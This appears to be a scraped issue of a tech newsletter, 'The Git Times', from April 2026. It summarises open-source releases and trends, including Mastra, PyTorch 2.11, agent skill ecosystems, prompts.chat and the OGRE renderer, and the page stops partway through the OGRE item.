Preset
Background
Text
Font
Size
Width
Account Thursday, April 9, 2026

The Git Times

“The question concerning technology is never merely technical.” — Martin Heidegger

AI Models
Claude Sonnet 4.6 $15/M GPT-5.4 $15/M Gemini 3.1 Pro $12/M Grok 4.20 $6/M DeepSeek V3.2 $0.89/M Llama 4 Maverick $0.60/M
Full Markets →

Mastra Release Strengthens Observability for TypeScript AI Apps 🔗

Latest version adds comprehensive RAG tracing, full signal export and flexible span filtering capabilities for developers

mastra-ai/mastra · TypeScript · 22.8k stars Est. 2024 · Latest: @mastra/core@1.24.0

Mastra's @mastra/core@1.24.0 release focuses on observability.

Mastra's @mastra/core@1.24.0 release focuses on observability. It adds end-to-end RAG tracing with new span types like RAG_INGESTION, RAG_EMBEDDING, RAG_VECTOR_OPERATION, RAG_ACTION and GRAPH_ACTION. Helpers such as startRagIngestion() and withRagIngestion() simplify instrumentation, which remains opt-in through observabilityContext.

The CloudExporter now ships logs, metrics, scores and feedback in addition to traces. Configuration uses a base collector URL for automatic path derivation.

New filtering options excludeSpanTypes and spanFilter in ObservabilityInstanceConfig let teams drop noisy spans such as MODEL_CHUNK before export. This helps control costs with usage-based observability services.

Compatibility with AI SDK v6 arrives through updated MessageList support and interop helpers including toAISdkMessages().

These features augment Mastra's TypeScript-native approach to AI development. The framework offers model routing to 40+ providers, autonomous agents that reason and use tools, and graph-based workflows with .then(), .branch() and .parallel() methods.

Human-in-the-loop support pauses agents or workflows for approval, resuming from stored state. Context management incorporates history, retrieved data and memory systems.

As AI applications scale, improved tracing and cost controls matter. Mastra integrates into React, Next.js or Node.js projects or deploys standalone.

Use Cases
  • TypeScript engineers building autonomous agents with tool selection
  • Teams orchestrating graph workflows with human approval checkpoints
  • Developers adding traceable RAG pipelines to Next.js applications
Similar Projects
  • LangChain.js - offers agent patterns but with weaker tracing controls
  • Vercel AI SDK - complements Mastra on UI but skips workflow engine
  • LlamaIndex.TS - specializes in retrieval versus Mastra's full agent stack

More Stories

Python Bot Automates Binance and Bybit Futures Trading 🔗

Multi-strategy system processes signals from Telegram and TradingView with live P&L tracking

Whit1985/Binance-Futures-Signal-Bot · Python · 513 stars 3d old

A Python application released this week gives traders a complete automation layer for cryptocurrency futures. Binance-Futures-Signal-Bot connects to Binance, Bybit and OKX through their official futures APIs, executing orders based on external signals or its internal engine.

The bot receives instructions through Telegram channels, TradingView webhooks or custom REST endpoints.

A Python application released this week gives traders a complete automation layer for cryptocurrency futures. Binance-Futures-Signal-Bot connects to Binance, Bybit and OKX through their official futures APIs, executing orders based on external signals or its internal engine.

The bot receives instructions through Telegram channels, TradingView webhooks or custom REST endpoints. Users configure leverage from 1x to 125x, dynamic position sizing calculated from account equity, and a trailing stop-loss engine that adjusts in real time. All parameters live in plain configuration files, allowing rapid iteration without changing code.

Four technical strategies run natively: EMA Crossover, RSI Divergence detection, Bollinger Band breakouts and MACD momentum signals. These can operate independently or in combination with third-party signals, giving quant developers hybrid logic without external dependencies.

A rich terminal dashboard refreshes position data and P&L continuously. The built-in position manager lets users list open trades and issue manual closes from the same interface. The project requires Python 3.10+, API keys with futures trading permissions, and runs on any machine with internet access.

For systematic traders, the value lies in removing latency and emotion between signal generation and execution while maintaining full visibility of performance across exchanges.

Use Cases
  • Crypto traders automate leveraged futures entries from Telegram signals
  • Developers integrate TradingView webhooks into multi-exchange execution engines
  • Quant funds monitor real-time P&L across Binance and Bybit positions
Similar Projects
  • Freqtrade - focuses on spot-market backtesting rather than live futures execution
  • Hummingbot - specializes in market-making instead of signal-driven directional trades
  • CCXT - supplies exchange abstractions but lacks built-in strategies and dashboard

WorldMonitor v2.5.23 Refines Geopolitical Dashboard Usability 🔗

Latest release adds drag-to-reorder world clock and resolves Tauri desktop issues

koala73/worldmonitor · TypeScript · 47.5k stars 3mo old

WorldMonitor has shipped version 2.5.23, delivering targeted usability and stability improvements to its real-time global intelligence dashboard.

WorldMonitor has shipped version 2.5.23, delivering targeted usability and stability improvements to its real-time global intelligence dashboard.

The update introduces a redesigned World Clock panel with live financial city times and drag-to-reorder functionality for city rows. Desktop users running the Tauri 2 native apps on macOS, Windows or Linux benefit from fixes that resolve sidecar 401 errors, variant locking problems and registration workflow bugs. Live news fullscreen rendering now correctly layers above all UI elements, while mobile views gain collapsible maps and refined panel sizing.

At core the TypeScript application, built with Vite, aggregates 435 curated news feeds and synthesizes briefs through local Ollama models with no API keys required. Its dual map engine combines globe.gl with Three.js for 3D globes and deck.gl plus MapLibre GL for flat WebGL projections carrying 45 data layers. Cross-stream correlation surfaces convergence between military, economic, disaster and escalation signals. The Country Intelligence Index produces composite risk scores from 12 categories, and the finance radar tracks 92 stock exchanges alongside commodities, crypto and a seven-signal composite.

These changes reduce daily friction in a single codebase that also generates tech, finance, commodity and happy variants. The incremental refinements keep the self-hosted situational awareness interface practical for builders who need fused open-source intelligence without external dependencies.

(178 words)

Use Cases
  • OSINT analysts correlating military economic and disaster signals
  • Financial traders monitoring composite risk scores across timezones
  • Infrastructure teams tracking real-time global escalation indicators
Similar Projects
  • Palantir Gotham - enterprise data fusion requiring heavy infrastructure
  • OpenCTI - graph-focused threat intel without native dual maps
  • Kibana - flexible dashboards lacking built-in geopolitical indexing

Local Dashboard Tracks Claude Code Token Usage 🔗

Python utility parses logs for costs, charts, history and progress bars using only standard library functions

phuryn/claude-usage · Python · 648 stars 1d old

A Python application converts local usage logs generated by Claude Code into a browser-based dashboard showing token counts, cost estimates and session history.

The tool reads JSONL transcripts written by the claude CLI, the VS Code extension and dispatched sessions, then loads them into an SQLite database at `~/.claude/usage.

A Python application converts local usage logs generated by Claude Code into a browser-based dashboard showing token counts, cost estimates and session history.

The tool reads JSONL transcripts written by the claude CLI, the VS Code extension and dispatched sessions, then loads them into an SQLite database at ~/.claude/usage.db. It works for API, Pro and Max plans. Pro and Max subscribers receive a progress bar that displays consumption against plan limits, information absent from Anthropic’s web interface.

No third-party packages are required. The project uses only sqlite3, http.server, json and pathlib, matching the Python environment already present for Claude Code users. Running python cli.py dashboard scans new logs and opens the interface at http://localhost:8080. Separate commands deliver today summaries by model and stats for all-time totals.

Cowork sessions are excluded because they produce no local transcripts. The scanner accepts a custom projects directory flag for teams working across repositories. Environment variables can set alternate host and port values.

By surfacing precise per-project and per-model data, the dashboard lets developers observe usage patterns and manage expenses without relying on incomplete vendor reports. Instructions support both Windows (python cli.py) and Unix (python3 cli.py) environments.

Use Cases
  • Software developers monitor daily Claude token usage by model
  • Teams estimate operational costs for AI coding projects
  • Pro subscribers track progress toward monthly usage limits
Similar Projects
  • openai-usage - provides API token tracking but lacks Claude-specific progress bars
  • llm-cost-monitor - focuses on multi-provider cost calculation without local log parsing
  • claude-stats-cli - terminal-only analyzer missing the web dashboard interface

Codesight Maps Codebases to Cut AI Token Waste 🔗

Universal context generator creates precise markdown files that save thousands of tokens per conversation

Houseofmvps/codesight · TypeScript · 667 stars 4d old

AI coding assistants typically waste thousands of tokens per session simply mapping a project's structure, frameworks, and dependencies. Codesight solves this with a single npx command that analyzes the entire codebase and outputs optimized context files.

The TypeScript tool delivers full abstract syntax tree precision on TypeScript projects, mapping modules, components, and relationships exactly.

AI coding assistants typically waste thousands of tokens per session simply mapping a project's structure, frameworks, and dependencies. Codesight solves this with a single npx command that analyzes the entire codebase and outputs optimized context files.

The TypeScript tool delivers full abstract syntax tree precision on TypeScript projects, mapping modules, components, and relationships exactly. For the eleven other supported languages — JavaScript, Python, Go, Ruby, Elixir, Java, Kotlin, Rust, PHP, Dart, Swift, and C# — it applies pattern detection across more than 30 frameworks and 13 ORM libraries. Analysis completes in milliseconds with zero runtime dependencies.

Output integrates directly with Claude Code, Cursor, GitHub Copilot, OpenAI Codex, Aider, and any tool that accepts markdown. The generated files replace repetitive context-building, producing measurable token savings on every subsequent interaction.

Additional commands extend its utility. npx codesight --wiki builds a persistent knowledge base in .codesight/wiki/ compiled from AST data. The --init flag creates CLAUDE.md, .cursorrules, and AGENTS.md files tuned to each environment. Other options include --blast for change impact reports, --mcp to run as a server exposing 13 tools, and --benchmark to quantify savings.

Developed by solo founder Kailesk Khumar, the project includes 27 tests and has been validated on more than 25 open-source repositories. It treats context engineering as deterministic analysis rather than conversational overhead.

**

Use Cases
  • Engineers generating context for Claude Code conversations
  • Teams building persistent wiki knowledge bases from code
  • Developers analyzing blast radius before file changes
Similar Projects
  • Aider - maintains dynamic context during chats instead of pre-generating static maps
  • Continue.dev - focuses on IDE retrieval rather than standalone CLI analysis
  • RepoMap - produces basic graphs but lacks codesight's ORM and framework detectors

PhoneClaw Runs Private AI Agent on iPhone 🔗

Swift app uses Gemma 4 for completely offline calendar, contact and image tools

kellyvv/PhoneClaw · Swift · 508 stars 4d old

PhoneClaw turns iPhones into fully local AI agents that perform all reasoning on-device with Gemma 4. Written in Swift, the application maintains zero network connections by default, ensuring chats, photographs and personal data never leave the handset.

The architecture centers on a file-based skill system.

PhoneClaw turns iPhones into fully local AI agents that perform all reasoning on-device with Gemma 4. Written in Swift, the application maintains zero network connections by default, ensuring chats, photographs and personal data never leave the handset.

The architecture centers on a file-based skill system. Each capability is defined in a SKILL.md Markdown file, allowing new tools to be added or modified without recompiling the app. Built-in skills translate natural language into system actions: creating calendar events with title, time and location; setting timed reminders that trigger native notifications; adding or updating contacts with automatic deduplication by phone number; reading and writing the system clipboard; and translating text while detecting source language.

Multimodal support lets users snap a photo or pick one from the library for on-device description, chart reading or scene analysis. Recent updates improved memory handling so inference budgets scale with actual free RAM rather than fixed prompt lengths. This keeps multi-turn tool calls stable and prevents premature truncation of long contexts or responses. A lighter Gemma 4 E2B variant runs on A16 devices for basic tasks while the E4B model delivers robust agent performance on iPhone 15 Pro and newer hardware. Models can be downloaded directly on the phone or bundled at build time.

The project demonstrates practical on-device agent design that prioritizes user privacy and extensibility within mobile memory constraints.

Use Cases
  • iPhone owners creating calendar events via natural language (8 words)
  • Privacy conscious users analyzing personal photos entirely on-device (8 words)
  • Professionals managing contacts and reminders without cloud servers (8 words)
Similar Projects
  • mlx-swift-examples - supplies core on-device inference but lacks extensible skill files
  • private-llm-ios - offers basic offline chat without multimodal agent capabilities
  • gemma-ios-mlx - early model ports missing stable multi-turn router and memory manager

Open Source Assembles Modular Skill Stacks for AI Agents 🔗

From reusable engineering capabilities to memory layers and real-time orchestration runtimes, developers are constructing the foundational infrastructure for autonomous agent ecosystems.

The open source community is rapidly converging on a new architectural pattern: modular, composable AI agent systems built from interchangeable skills, persistent memory primitives, orchestration frameworks, and specialized runtimes. Rather than treating large language models as isolated chat interfaces, these projects treat them as programmable entities that can acquire new capabilities, maintain state across sessions, and coordinate with other agents.

This cluster reveals a clear technical shift toward an "agent operating system.

The open source community is rapidly converging on a new architectural pattern: modular, composable AI agent systems built from interchangeable skills, persistent memory primitives, orchestration frameworks, and specialized runtimes. Rather than treating large language models as isolated chat interfaces, these projects treat them as programmable entities that can acquire new capabilities, maintain state across sessions, and coordinate with other agents.

This cluster reveals a clear technical shift toward an "agent operating system." At the lowest layer are skills — encapsulated, reusable behaviors that agents can discover and invoke. Repositories like add yosmani/agent-skills, anthropics/skills, sickn33/antigravity-awesome-skills (curating 800+ capabilities), and kepano/obsidian-skills demonstrate how skills ranging from git operations to Markdown canvas manipulation are being formalized and shared. Persona-based extensions in xixu-me/awesome-persona-distill-skills further show agents adopting specialized identities ("乔布斯.skill", "女娲.skill") to alter reasoning patterns.

Infrastructure projects address the harder problems of state and coordination. supermemoryai/supermemory and memvid/memvid provide high-performance, serverless memory layers that replace brittle RAG pipelines with instant retrieval and long-term recall. neomjs/neo offers a multi-threaded AI-native runtime with a persistent Scene Graph, letting agents literally introspect and mutate live application structures. risingwavelabs/risingwave delivers real-time event streaming infrastructure purpose-built for agent communication and analytics.

Orchestration and specialization complete the stack. mastra-ai/mastra, langchain-ai/deepagents, ruvnet/ruflo, and Yeachan-Heo/oh-my-claudecode enable multi-agent swarms and hierarchical task decomposition. Domain-specific implementations such as PrathamLearnsToCode/paper2code, karpathy/autoresearch, Datus-ai/Datus-agent, KeygraphHQ/shannon (autonomous pentesting), and HKUDS/CLI-Anything prove the pattern's versatility across research, data engineering, security, and interface control.

Collectively, these projects signal that open source is moving beyond prompting toward agentic primitives — standardized, discoverable components that can be mixed and matched like npm packages or Unix tools. The pattern suggests a future where building sophisticated AI systems resembles assembling microservices rather than writing monolithic prompts. By making skills, memory, and orchestration modular and community-owned, open source is democratizing the creation of agents that can autonomously handle complex software engineering, research, and operational workflows.

This infrastructural explosion around anthropics/claude-code, block/goose, and similar agent hosts indicates the ecosystem is maturing quickly, establishing the technical foundation for agents that don't just suggest code but own entire development cycles.

Use Cases
  • Engineers extending coding agents with production-grade skills
  • Researchers converting academic papers into working implementations
  • Security teams deploying autonomous web application pentesters
Similar Projects
  • CrewAI - Delivers role-based multi-agent collaboration patterns that complement the skills and orchestration focus seen here
  • LangGraph - Provides graph-based workflow construction that aligns with the memory and swarm intelligence layers in this cluster
  • AutoGen - Microsoft’s multi-agent conversation framework that these newer skills-first projects significantly extend with concrete coding and memory primitives

AI Agents Drive Evolution of Agent-Native Web Frameworks 🔗

Open source projects are redesigning web runtimes with persistent structures that AI can introspect, mutate, and control in real time.

An emerging pattern is reshaping open source: web frameworks are evolving from static rendering engines into agent-native runtimes that treat live application state as a queryable, mutable graph for AI systems. Rather than bolting AI onto existing web stacks, developers are building new foundations where large language models can directly observe, reason about, and modify application behavior without brittle DOM scraping or brittle APIs.

neo from neomjs exemplifies this shift.

An emerging pattern is reshaping open source: web frameworks are evolving from static rendering engines into agent-native runtimes that treat live application state as a queryable, mutable graph for AI systems. Rather than bolting AI onto existing web stacks, developers are building new foundations where large language models can directly observe, reason about, and modify application behavior without brittle DOM scraping or brittle APIs.

neo from neomjs exemplifies this shift. Its multi-threaded, AI-native engine maintains a persistent Scene Graph that allows AI agents to introspect and mutate the living structure of an application in real time. This moves beyond traditional virtual DOM approaches to create an environment explicitly designed for autonomous agents.

The same philosophy appears across the cluster. mastra, from the team behind Gatsby, delivers a modern TypeScript framework for constructing AI-powered applications and agents from the start. supermemory functions as a high-speed, scalable Memory API purpose-built for the AI era, giving agents persistent recall across web sessions. Alibaba’s page-agent takes this further by embedding a JavaScript in-page GUI agent that lets natural language commands directly control web interfaces.

Supporting infrastructure reveals the depth of the trend. SigNoz provides OpenTelemetry-native observability that can monitor both traditional metrics and complex agentic flows within these systems. Tools like KeygraphHQ/shannon (autonomous white-box AI pentester), JCodesMore/ai-website-cloner-template, and HKUDS/CLI-Anything demonstrate how web surfaces themselves are becoming programmable by agents. Even established projects like gin for high-performance Go backends and angie as an nginx replacement appear as stable foundations that new AI-native layers build upon.

Technically, this pattern replaces imperative UI paradigms with declarative, graph-based structures optimized for LLM function calling. Applications gain persistent identity beyond individual HTTP requests, enabling agents to plan, execute, observe outcomes, and self-correct across sessions. The boundary between frontend, backend, and intelligence layer dissolves.

This cluster signals where open source is heading: a web no longer built solely for humans but co-designed with autonomous agents that can read, write, debug, and evolve applications alongside human developers. The result will be faster iteration, self-healing systems, and entirely new classes of adaptive software.

**

Use Cases
  • AI engineers creating self-modifying web applications
  • Security teams running autonomous web vulnerability scans
  • Product teams generating interactive demos from natural language
Similar Projects
  • LangGraph - Focuses on agent orchestration but lacks neo's persistent scene graph for live UI mutation
  • Vercel v0 - Generates web components from prompts yet doesn't expose real-time agent introspection APIs
  • AutoGen - Enables multi-agent conversations but operates outside native web runtime structures like Mastra

Modular LLM Tools Drive Rise of Agentic Coding Ecosystems 🔗

From token optimizers and reusable agent skills to local multimodal engines, open source is composing practical infrastructure atop frontier models.

An emerging pattern in open source reveals a maturing LLM tooling layer focused on making large language models efficient, extensible, and truly agentic for software development. Rather than competing with frontier model providers, these projects supply the specialized components—context managers, execution primitives, memory layers, and hardware accelerators—that turn raw model access into reliable workflows.

Token efficiency has become a foundational concern.

An emerging pattern in open source reveals a maturing LLM tooling layer focused on making large language models efficient, extensible, and truly agentic for software development. Rather than competing with frontier model providers, these projects supply the specialized components—context managers, execution primitives, memory layers, and hardware accelerators—that turn raw model access into reliable workflows.

Token efficiency has become a foundational concern. rtk-ai/rtk uses a dependency-free Rust binary to proxy common developer commands, cutting token usage by 60-90%. Houseofmvps/codesight generates compact context representations that work across Claude Code, Cursor, Copilot and similar tools. router-for-me/CLIProxyAPI wraps multiple vendor CLIs into a single OpenAI-compatible service, letting teams route work to free tiers of Gemini, Claude, or Qwen without changing upstream code.

A second cluster revolves around agent primitives, especially around Anthropic’s terminal-native anthropics/claude-code. The pattern is clear in hesreallyhim/awesome-claude-code, sickn33/antigravity-awesome-skills (cataloging 800+ tested skills), and anthropics/skills. These repositories treat agent capabilities as reusable modules—slash commands, git orchestration, test execution—that any downstream tool can import. block/goose (Rust) and ruvnet/ruflo push further, offering extensible agents and distributed swarm orchestration with native RAG and memory. mastra-ai/mastra, from the Gatsby team, supplies a full TypeScript framework for building such agents with modern web stacks.

Local and multimodal execution completes the picture. mattmireles/gemma-tuner-multimodal demonstrates fine-tuning Gemma 3n and 4 with audio, images, and text directly on Apple Silicon using Metal Performance Shaders. Blaizzy/mlx-vlm and zml/zml (Zig/MLIR) target “any model, any hardware” without compromise. Memory bottlenecks are addressed by memvid/memvid, which replaces complex RAG pipelines with a single-file, serverless store. Browser-native knowledge graphs (abhigyanpatwari/GitNexus) and advanced technique notebooks (NirDiamant/RAG_Techniques) show the pattern extending beyond the terminal.

Collectively these repositories signal where open source is heading: toward composable LLM infrastructure. By modularizing context handling, agent skills, local acceleration, and orchestration, the ecosystem is shifting from novelty chat interfaces to production-grade, cost-aware autonomous coding systems that run on laptops, clusters, or entirely in-browser. The focus has moved from training bigger models to engineering the plumbing that makes them practical everywhere.

This tooling layer—small, focused, and interoperable—will likely define the next wave of AI-native development.

Use Cases
  • Developers automating codebase navigation and edits with CLI agents
  • Engineers optimizing token spend across multiple LLM coding tools
  • Teams fine-tuning multimodal models locally on Apple Silicon
Similar Projects
  • LangGraph - Extends LangChain with stateful multi-agent graphs, mirroring ruflo's orchestration focus but in Python
  • CrewAI - Delivers role-based agent collaboration frameworks that parallel the swarm capabilities seen in this cluster
  • Ollama - Simplifies local LLM serving and matches the hardware-agnostic inference direction of zml and mlx-vlm

Deep Cuts

Transform Ideas Into Reddit Videos With One Command 🔗

Python tool automates video creation from scripts for maximum platform engagement and virality

elebumm/RedditVideoMakerBot · Python · 431 stars

In the vast expanse of GitHub repositories, few tools deliver on their promise as elegantly as RedditVideoMakerBot. This Python-powered discovery allows anyone to create polished Reddit videos with literally one command.

The project streamlines what used to be a complex, multi-hour process.

In the vast expanse of GitHub repositories, few tools deliver on their promise as elegantly as RedditVideoMakerBot. This Python-powered discovery allows anyone to create polished Reddit videos with literally one command.

The project streamlines what used to be a complex, multi-hour process. Feed it a script, select a style, and watch as it generates voice narration, pulls complementary visuals, adds synchronized captions, and exports a ready-to-upload MP4.

It's designed specifically for the unique rhythms of Reddit content — short, punchy, and highly shareable.

Builders should take note of its extensibility. The modular architecture invites customization, whether integrating cutting-edge AI models for more natural voices or developing templates for specific subreddit aesthetics. Its potential extends beyond simple videos to full-fledged automated content factories.

This isn't just about convenience. RedditVideoMakerBot represents a shift in how digital creators work, removing technical barriers and amplifying creative output. For developers, it's an invitation to build upon a solid foundation and explore new possibilities in automated media production.

Use Cases
  • Independent creators produce narrated storytime videos for popular subreddits
  • Marketers develop promotional videos targeting niche Reddit communities
  • Developers build automated content pipelines for daily Reddit posts
Similar Projects
  • zulko/moviepy - Offers video editing library but lacks one-command automation
  • coqui-ai/TTS - Provides voice synthesis without integrated video creation
  • reddit-bot-framework - Manages Reddit API interactions but not video generation

Quick Hits

Keychron-Keyboards-Hardware-Design Builders get 100+ editable CAD models (STEP/DXF/PDF) of Keychron keyboard cases, plates, stabilizers, encoders and keycaps plus M1–M7 mice for custom mechanical projects. 495
gemma-tuner-multimodal Fine-tune Gemma 4 and 3n with audio, images and text on Apple Silicon, using PyTorch and Metal Performance Shaders. 835

PyTorch 2.11 Advances Distributed Training Features 🔗

Latest release adds differentiable collectives and FlashAttention-4 while dropping Volta GPU support

pytorch/pytorch · Python · 98.9k stars Est. 2016 · Latest: v2.11.0

PyTorch 2.11.0 introduces targeted improvements for developers working with large-scale models and modern hardware.

PyTorch 2.11.0 introduces targeted improvements for developers working with large-scale models and modern hardware. The most significant addition is support for differentiable collectives in distributed training, permitting gradients to pass through communication primitives. This change simplifies implementation of advanced parallel algorithms that were previously difficult to differentiate end-to-end.

FlexAttention gains a FlashAttention-4 backend specifically tuned for Hopper and Blackwell GPUs, delivering measurable speedups on NVIDIA's newest architectures. Apple Silicon users receive comprehensive operator coverage on the MPS backend, while new RNN and LSTM GPU export capabilities ease deployment pipelines. XPU Graph support further extends the framework's hardware reach.

These additions arrive alongside a deliberate breaking change: CUDA 12.8 and 12.9 binaries no longer ship with Volta (SM 7.0) support. The removal reflects the industry's shift away from eight-year-old hardware and frees maintenance resources for current platforms.

The library remains anchored by its original strengths—torch tensors that mirror NumPy semantics with robust GPU acceleration, and a tape-based autograd system that enables fully dynamic neural networks. Components such as torch.nn, torch.jit, and torch.multiprocessing continue to provide flexible building blocks that integrate cleanly with existing Python scientific tooling.

The release also contains performance optimizations, bug fixes, and documentation updates. For teams running production workloads, the changes tighten the gap between research prototypes and efficient scaled deployment.

**

Use Cases
  • ML engineers training models with differentiable distributed collectives
  • Researchers optimizing attention layers on Hopper and Blackwell GPUs
  • Developers expanding RNN deployments across GPU and MPS backends
Similar Projects
  • TensorFlow - Static computation graphs versus PyTorch's dynamic execution
  • JAX - Functional transformations and XLA compilation without nn module
  • ONNX Runtime - Inference optimization layer rather than full training framework

More Stories

Self-Hosted Prompts Enable Private AI Consistency 🔗

Updated deployment tools let teams run isolated libraries with enterprise authentication and selective syncing

f/prompts.chat · HTML · 158.5k stars Est. 2022

prompts.chat has extended its self-hosting capabilities to address a core tension in enterprise AI adoption: balancing access to battle-tested prompts with strict data governance. The project maintains a curated, model-agnostic collection of prompt examples that work with ChatGPT, Claude, Gemini, Llama, Mistral and other systems.

prompts.chat has extended its self-hosting capabilities to address a core tension in enterprise AI adoption: balancing access to battle-tested prompts with strict data governance. The project maintains a curated, model-agnostic collection of prompt examples that work with ChatGPT, Claude, Gemini, Llama, Mistral and other systems. Organizations can now deploy fully private instances without exposing proprietary use cases.

Setup has been simplified to a single command. Running npx prompts.chat new my-prompt-library launches an interactive wizard that configures branding, themes, and authentication through GitHub, Google, or Azure AD. The resulting Next.js application can run on-premises or in private cloud environments, with Docker images provided for consistent deployment. Administrators choose whether to sync new community prompts or keep the library entirely isolated.

The underlying data remains accessible in multiple formats, including CSV and a Hugging Face dataset, allowing teams to ingest prompts into internal tools. Recent updates emphasize granular feature toggles so organizations can disable public contributions while retaining the interactive prompt engineering book and its 25 chapters on chain-of-thought reasoning, few-shot learning, and agent design.

This matters now because fragmented prompt practices across teams produce inconsistent LLM outputs and raise compliance risks. Self-hosted prompts.chat gives engineering and research groups a single source of truth they control.

Self-hosting features:

  • Wizard-driven configuration of auth and branding
  • Docker support and one-click setup
  • Optional bidirectional sync with the public library
Use Cases
  • Engineering teams deploy private prompt repos with Azure AD
  • Research labs curate model-specific prompts under data controls
  • Training departments customize interactive prompting curricula internally
Similar Projects
  • LangChain - embeds prompts in code rather than offering self-hosted libraries
  • Promptfoo - focuses on automated testing instead of community curation and hosting
  • Dify - provides visual orchestration but requires its own cloud infrastructure

Claude Cookbooks Refresh Tool Use and RAG Recipes 🔗

Recent updates deliver concrete patterns for agents, SQL queries and vector search

anthropics/claude-cookbooks · Jupyter Notebook · 37.7k stars Est. 2023

Three years after its introduction, Anthropic’s claude-cookbooks repository received fresh commits in April 2026 that expand its library of Jupyter notebooks. The updates focus on production-oriented patterns that developers can copy directly into applications built against the Claude API.

The cookbooks are organized around three themes.

Three years after its introduction, Anthropic’s claude-cookbooks repository received fresh commits in April 2026 that expand its library of Jupyter notebooks. The updates focus on production-oriented patterns that developers can copy directly into applications built against the Claude API.

The cookbooks are organized around three themes. Capabilities notebooks demonstrate text classification, efficient summarization, and retrieval-augmented generation that grounds Claude responses in external knowledge. Tool-use sections show how to bind Claude to external functions: a customer-service agent that routes queries, a calculator for precise arithmetic, and a notebook that translates natural-language requests into validated SQL before execution.

Third-party integration recipes cover Pinecone vector databases for semantic search, live Wikipedia lookups, web-page scraping, and embedding workflows. Each notebook includes prerequisites, error-handling examples, and minimal Python code that can be adapted to any language capable of making HTTP calls to the Claude API.

These recipes matter now because organizations are moving from chat prototypes to deployed agents that must reliably call tools and cite fresh data. The community-maintained repository lowers the cost of adopting current best practices without forcing teams to rediscover common failure modes around context windows, function-calling schemas, or retrieval precision.

Contributing remains straightforward: review open issues, submit new notebooks or fixes, and avoid duplicating existing work.

Use Cases
  • Backend engineers building customer service agents with tool calling
  • Data teams implementing RAG pipelines using Pinecone vector stores
  • Analysts creating natural language interfaces for SQL database queries
Similar Projects
  • openai/openai-cookbook - provides parallel Python recipes focused on GPT models
  • langchain-ai/langchain - supplies higher-level abstractions instead of raw API patterns
  • pinecone-io/pinecone-examples - narrows scope to vector database operations only

Quick Hits

firecrawl Firecrawl turns any website into clean, structured LLM-ready data, giving AI agents reliable web intelligence without the scraping headaches. 106.2k
RAG_Techniques Master advanced RAG techniques that boost retrieval precision, context relevance, and generation quality for production-grade AI systems. 26.6k
Deep-Live-Cam Deep-Live-Cam delivers real-time face swapping and one-click video deepfakes from a single image for rapid creative prototyping. 89.4k
ColossalAI ColossalAI slashes the cost and complexity of training massive models, making frontier AI development faster and more accessible. 41.4k
ray Ray's distributed compute engine scales ML workloads across clusters with battle-tested libraries for training, tuning, and serving. 42k
supabase The Postgres development platform. Supabase gives you a dedicated Postgres database to build your web, mobile, and AI applications. 100.5k

Dynamixel SDK 4.0.4 Adds Unified CMake Build for C and C++ 🔗

Latest release modernizes compilation workflow as robotics teams demand consistent tooling across platforms and languages.

ROBOTIS-GIT/DynamixelSDK · C++ · 576 stars Est. 2016 · Latest: 4.0.4

ROBOTIS has released version 4.0.4 of its Dynamixel SDK, introducing `CMakeLists.

ROBOTIS has released version 4.0.4 of its Dynamixel SDK, introducing CMakeLists.txt files that deliver a single, unified build system for both the C and C++ libraries. The update, contributed by Hyungyu Kim and dated March 2026, eliminates previous fragmentation in how developers compile the core components across Linux, Windows, and macOS environments.

The SDK remains the standard interface for controlling Dynamixel actuators through packet-based communication. It implements both Protocol 1.0 and 2.0, managing sync reads, sync writes, bulk operations, checksum validation, and error recovery that would otherwise burden application code. By abstracting the serial bus details, the library lets engineers focus on robot behavior rather than byte-level protocol handling.

Core strength lies in its language coverage. The C and C++ implementations supply both source code and pre-built dynamic libraries—.so on Linux, .dll on Windows, .dylib on macOS—while official bindings extend the same functionality to Python, C#, Java, MATLAB, and LabVIEW. For ROS users, the SDK underpins dedicated packages including dynamixel_sdk, dynamixel_workbench, and dynamixel_workbench_msgs, enabling straightforward integration with navigation stacks, manipulation pipelines, and real-time control loops.

The new CMake support matters because modern robotics projects rarely live in a single language or operating system. Teams combining embedded Arduino controllers with desktop Python analysis or ROS 2 nodes previously faced divergent build steps. A unified CMake configuration reduces onboarding time, simplifies CI pipelines, and minimizes platform-specific bugs that historically appeared only during cross-compilation.

Documentation continues to center on the ROBOTIS e-Manual, which provides packet reference tables, API walkthroughs, and troubleshooting guides for each supported language. The release notes emphasize that existing application code requires no changes; the update targets build infrastructure alone.

For a project first published in 2016, sustained maintenance signals reliability to production users. Whether synchronizing 18 actuators in a quadruped or commanding a single servo in an educational prototype, the SDK delivers deterministic timing and consistent error semantics that proprietary alternatives often lack. The CMake addition brings the library in line with contemporary open-source expectations without altering its proven architecture.

Builders should update their local clones and review the top-level CMake configuration before their next cross-platform sprint. The change, though modest, removes a persistent source of friction for teams shipping hardware that must operate identically from simulation to factory floor.

Use Cases
  • ROS engineers syncing actuators in manipulation pipelines
  • Embedded developers controlling servos from Arduino boards
  • Research teams integrating feedback in MATLAB prototypes
Similar Projects
  • ros2_control - Offers hardware abstraction layers but requires separate Dynamixel drivers
  • interbotix_ros - Provides higher-level arm APIs that depend on this SDK for packet handling
  • PyDynamixel - Delivers Python-only control with narrower protocol and platform support

More Stories

OGRE 14.5.2 Tightens Android and Backend Stability 🔗

Maintenance release modernises dependencies and corrects rendering, input and build issues across platforms

OGRECave/ogre · C++ · 4.5k stars Est. 2015

OGRE has issued version 14.5.2, a maintenance release that refines its long-standing role as a modular, high-performance rendering backend.

OGRE has issued version 14.5.2, a maintenance release that refines its long-standing role as a modular, high-performance rendering backend. The update focuses on platform reliability rather than headline features, reflecting the needs of teams maintaining complex 3D pipelines that scale from embedded robotics to high-end visualisation.

CMake scripts now align Android libraries to 16k boundaries, refresh project templates, update Freetype to 2.14.1 and Assimp to 6.0.3. Android touch input offsets with hidden navbars are fixed, gamma handling is synchronised with config dialogs, and Win32 pixel-format selection is improved. GL hardware buffers respect shadow-buffer requests, while GLES2 ensures sRGB formats are colour-renderable and mipmap generation works correctly with gamma. D3D11 properly honours automatic mip creation. The RTSS CookTorrance shader corrects double gamma on ambient colour, and the Assimp plugin resolves material-resource-map keys and WebP extension mapping.

These changes matter because OGRE abstracts Vulkan, Direct3D 11, OpenGL, OpenGL ES and Metal, letting engine programmers concentrate on application logic. Its battle-tested feature set—PBR workflows, stencil and texture shadows, skeletal animation, flexible particle systems, advanced compositor post-processing (bloom, HDR), multi-layer terrain with LOD, Dear ImGui integration and Bullet Physics support—remains in active use wherever developers need a flexible C++ foundation with Python, C# and Java bindings.

The HighPy bindings continue to enable rapid prototyping. A typical snippet loads a glTF DamagedHelmet.glb, places a point light and runs the render loop in fewer than ten lines.

Use Cases
